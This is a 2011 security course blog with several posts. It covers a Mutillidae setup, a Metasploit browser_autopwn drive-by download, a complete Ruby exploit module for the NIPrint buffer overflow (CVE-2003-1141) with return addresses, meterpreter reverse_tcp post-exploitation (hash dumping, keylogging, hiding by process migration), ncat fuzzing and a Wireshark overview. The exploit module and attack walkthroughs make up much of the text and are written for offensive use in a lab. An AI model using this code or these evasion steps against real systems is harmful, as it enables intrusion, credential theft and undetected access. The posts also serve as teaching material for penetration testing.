Friday, March 11, 2011

Introduction to Mutillidae

Mutillidae is a set of PHP Vulnerable Scripts that implement the OWASP for testing and teaching purposes. Top 10
It has been done in such a way that it is easy to demonstrate common attacks to others. Feel free to use it in your own classes. Many web app hobbyists and professionals used PHP, and it’s pretty easy to pick up the basics of the language.

Features of the Mutillidae project:
1. Make the code and examples simple to understand so as to get the point across of how a given vulnerability works. With some of the stuff in Webgoat it is s a little hard to figure how to exploit the code, Mutillidae almost exploits itself. My app won’t be very realistic, but it should illustrate the core concepts well.
2. Be geared in such a way that it’s easy to update with new modules and hints.
3. Easy to install and run. Just download XAMPP Lite for Windows or Linux, put the scripts in the htdocs directory, and click the “Setup/reset the DB” link in the main menu.


Installation procedure:
Extract the files somewhere in the htdocs folder of XAMPP (for example htdocs/mutillidae). Also, it should go without saying that you should NOT run this code on a production network. Either run it on a private network, or restrict your web server software to only use the local loopback address. You can do that by finding the “Listen” line in the http.conf file and changing it to read: Listen 127.0.0.1:80

Run xampp apache server and then type in http://localhost/mutillidae . A page will appear to try top ten vulnerabilities. Try to play with these vulnerabilities and explore it more for fun.

Sunday, March 6, 2011

Creating Drive-by-download using Metasploit

Today we will discuss how to create a ‘drive by download’ using Metasploit.
“Drive-by-download is a type of injection to the target system. When client requests for a service from Hackers machine prepared by Black Hat, some malicious data or programs gets downloaded to client system without the knowledge of client.”
There is a module named as browser_autopwn written by ‘EGYPT’ to create such an exploit. To start the steps of creating drive-by-download, first update the metasploit and run it. This auxiliary resides in ‘server/browser_autopwn’. Type the command ‘use server/browser_autopwn’ and gets information about it using ‘info’ command. This module comes with several loaded payloads of reverse_tcp connections. We need to configure two main things: lhost which is IP address of host machine interface connected to remote machines and URIPATH which is path down in directory of IP address of server. You can check the loaded payloads using ‘set’ command, it will show all the attributes with their values set.
When we execute the exploit command, several payloads get loaded and server is started to listen on port 8080 with specified IP address. From the client computer, in the browser type IP address of server with port number and URIPATH like ‘http://192.168.80.101:8080/uripath’. The client system automatically downloads some programs from meterpreter library and opens a session (shell window accessing memory of target machine) on hacker’s machine. Then session of meterpreter is automatically migrated to another process (notepad.exe) and it becomes difficult to identify the exploit on client machine.
This drive-by-download can be loaded and exploited on such browser which has this vulnerability. Fully patched or newer versions got patched or do not have this vulnerability, so this exploit cannot be done in Win 7 explorer and Linux Ubuntu explorer.

Saturday, February 26, 2011

Exploit writing for Metasploit in ruby

So today, I’m going to explain how exploits can be written as a metasploit module.
Metasploit modules are written in ruby. Even if you don’t know a lot about ruby, you should still be able to write a metasploit exploit module based on this discussion and the referencing some existing exploits available in metasploit.

Metasploit exploit module structure

A typical metasploit exploit module consists of the following components:

header and some dependencies
  • Some comments about the exploit module
  • require ‘msf/core’
class definition
includes
“def” definitions :
  • initialize
  • check (optional)
  • exploit
You can put comments in your metasploit module by using the # character.  That’s all we need to know for

now, let’s look at the steps to build a metasploit exploit module.

----------------------------------------------------------------------------------------
##
# $Id: newniprint.rb 00001 2011-02-23 20:45:00Z Malkiat $
##

##
# This exploit is created by Malkiat Singh for Week 7 Lab in course info-6012 Hacking & Exploits
# This file is created to exploit the NIPrint running on remote machine
##
            #started with some introduction to this module

require 'msf/core'         #this line is required for the core functionality

class Metasploit3 < Msf::Exploit::Remote      #inherits remote exploits properties

            include Msf::Exploit::Remote::Tcp    
# NIPrint listens on TCP, so we include remote tcp in module
           
            def initialize(info = {})
                        super(update_info(info,
                                    'Name'           =>'Modified NIPrint Exploit', 
#name shown for the exploit
                                    'Description'    =>%q{It performs a exploit of stack buffer overflow in NIPrint  service running on remote machine},
                                    'Author'         =>['Malkiat Singh'],     
#who wrote this module
                                    'License'        =>'Alone',                                 
#licensed to whom
                                    'Version'        =>'$Revision: 00001 $',           
#any revision number for this module
                                    'References'     =>[
                                                ['CVE', '2003-1141'],                                                 
                                                ['BID', '8968'],    
                                                        #further references to this exploit
                                     ],
                                    'Privileged'     => false,
                                    'Payload'        =>
                                                {
                                                            'Space'    => 500,
                                                            'BadChars' => "\x00\x0a",     
#characters breaking shell code                                 
                                                },
                                    'Platform'       => 'win',
                                    'Targets'        =>[
                                                 ['Windows XP SP0', { 'Ret' => 0x77D5B99F }],
                                                            #window sp0 return address
                                                 ['Windows XP SP3', { 'Ret' => 0x7C9D30E3 }],
                                                            #window sp3 return address
                                                ],
                                    'DefaultTarget' => 0,
#show the target to attack by default
                                    'DisclosureDate' => 'Feb 23 2011'))
                        register_options(
                                    [
                                                Opt::RPORT(515)
#default port for remote niprint set to 515
                                    ], self.class )
            end
            def exploit
                        connect            #make connection

                        req = rand_text_alphanumeric(8192) 
#generate data to send
                        req[  0, 2] = "\xeb\x33"
                        req[ 49, 4] = [target.ret].pack('V')
#putting return address to 49 position calculated from pattern_offset.rb and  discussed in previous blog
                        req[ 53, payload.encoded.length ] = payload.encoded
#shell-code after return address

                        print_status("Trying target #{target.name}...")
                        sock.put(req)                #send payload

                        handler                        #give handle to payload
                        disconnect      
            end
end

Following few screenshots show the procedure to run this exploit module:
First, find the written module using search command. This module should be placed inside ‘framework/msf3/modules/exploit’ directory. Run the metasploit and find the module.


Use the module and set options:


Set the option and run the exploit:


A session will be created and meterpreter shell is available to target the remote machine. There are number of commands to execute which you can see using help command.

Saturday, February 12, 2011

Wireshark-great protocol analyzer tool

Today we got curious topic about introduction to Wireshark-a powerful tool.
Wireshark is a free tool available to analyze the traffic flowing across the network. It is also there  for windows operating system and you can download it for free from the website: http://www.wireshark.org/download.html . Installation steps are few and easy to handle. This tool is not only packet sniffer, but we can do a lot more with this tool. It is a collection of utilities which help us to find the malicious activities in our network.
It can capture packets on more than one interface at a time. It differentiates packets by time, protocol, source-destination address and type of query or method used. It displays a lot of information about single packet and re-assembled packets at the destination host. It is able to interpret some attributes automatically to make the task easy for security analyst.  Also, it can police packets with their field values and displays malicious packet in alerting colors. We can store packets in backups for later review to measure the activities.
Getting familiar with this tool is not cumbersome. Try to play with the tool and much more you can explore. However, there is a good tutorial online to get help for its standard operation on website: http://www.wireshark.org/docs/
We can select interface to capture packet travelling on it and get detailed information about every packet flowing with associated Hex values. Detailed information is divided by network layers and end of all application data is appended in form of queries, answers or data. When collections of packets in a pool get gathered, then filter can help you to exclude unwanted packets by means of source, destination address or protocol. Further, we can exclude some protocols from enable protocol menu item under Analyze tab.
To conclude, Wireshark is powerful network protocol analyzer tool to help us notify about malicious activities and unauthrized packets flowing in our network.

Friday, February 4, 2011

Exploiting target machine using meterpreter/reverse_tcp payload

Now I am going to discuss an interesting topic related to manipulation of NIPrint on target system using meterpreter : reverse tcp handler payload.
First, we need to start the Metasploit and load payload reverse_tcp, set additional attributes like rhost, lhost from steps as we discussed in previous blog topic.
This payload tries to exploit the vulnerability on target system by putting dll file through reflective dll injection and opens back command shell to manipulate the target for attacker.
When the exploit gets successfully executed, attackers can use any command from a list of commands to compromise the target. It can be getting process identifier of processes, dumping hashes of passwords, escalating privileges, hiding current session in another process, starting keystroke logger and many more.
You can find a list of commands to execute using ‘help’ command. Number of core commands, file system commands etc. get listed on the shell window.
Important thing is once you opened a session by exploiting NIPrint, you can hide your attack using ‘migrate’ command in different process. Your exploit cannot be detected as current session got associated with a different process. You can continue to manipulate the target, but no detection system can detect your presence on target system. Migrating from one process to another helps in continuing the exploit even when applications open and close quickly.
I hope this information may be helpful a lot.

Saturday, January 29, 2011

Automatic Exploit using Metasploit

Today topic of discussion is NIPrint exploitation using Metasploit.
Metasploit make the exploitation work easy for attackers by doing the exploit itself and initiating some terminal for the attacker to manipulate the target system.
Make sure, every time you run the Metasploit; don’t forget to update it first. Start the Metasploit Console session. It will load exploits, nops, auxiliary modes, payloads and encoders displayed on the screen along with prompt to execute commands.
For exploit related to specific application, you can find it using ‘search’ command. In this case, for NIPrint use command ‘search –t exploit ‘NIPrint’ ‘. This command lists the exploits which contains NIPrint in their name along with some description provided.
You can use the exploit using ‘use’ command followed by the complete path of exploit. For example: ‘use windows/lpd/niprint’. This loads the exploit for current operation. Use ‘info’ command to get detailed description about the exploit.
We can add payload to the exploit using ‘set’ command. If you don’t have an idea about which payload to use, you can take help using ‘show payloads’ command. You can choose from the list which payload you want to use with current exploit. The command for setting messagebox payload is: ‘set payload windows/messagebox’. Complete path of the payload should be defined to load it.
Further, you can check, see and set some of the attributes using setcommand. All attributes will get listed with default values and after providing values for necessary attributes, you can run the exploit using ‘exploit’ command. An exploit triggers and you will see the results depending upon the payload.
In messagebox, a window will appear on the target machine displaying default message with alert.
In last, if eventually you misconfigured a value, which can be removed using ‘unset’ command followed by the attribute name.

Sunday, January 23, 2011

Exploiting NIPrint using ncat

Now the topic of discussion is exploitation of NIPrint service using ncat command.
Download the NIPrint executable file from the link: http://www.computerdefense.org/class/nidemo.exe
And Immunity debugger executable file from the link:
http://debugger.immunityinc.com/register.html after providing some basic details.
After installation of both software programs in the VMware workstation, starts the debugger and NIPrint, then start both services: local and remote print service under ‘configuration’ tab and ‘general setting’ menu item. Also, install nmap on host machine to run ncat command.
From the host machine, open command prompt and run ncat <IP address of remote machine> 515. It will open command line for input from user. Try to enter as many A’s until the NIPrint on remote machine crashes by repetition of the above command.
Here Immunity debugger is used to prevent the exploit to occur, when we join the NIPrint application with debugger, any exploit attack results in pausing the application. Thus, we can track the exploit going on.
Moreover, to find the number of A’s required to do an exploit of stack buffer overflow in NIPrint is calculated using pattern_create.rb and pattern_offset.rb file. First file is used to generate string of different character and second is used to calculate its position in the string. We find the exact number of characters required by checking the overwritten EIP pointer with input characters in immunity debugger. That value is calculated as an offset value and total numbers of input characters are calculated before EIP to do buffer overflow for NIPrint program.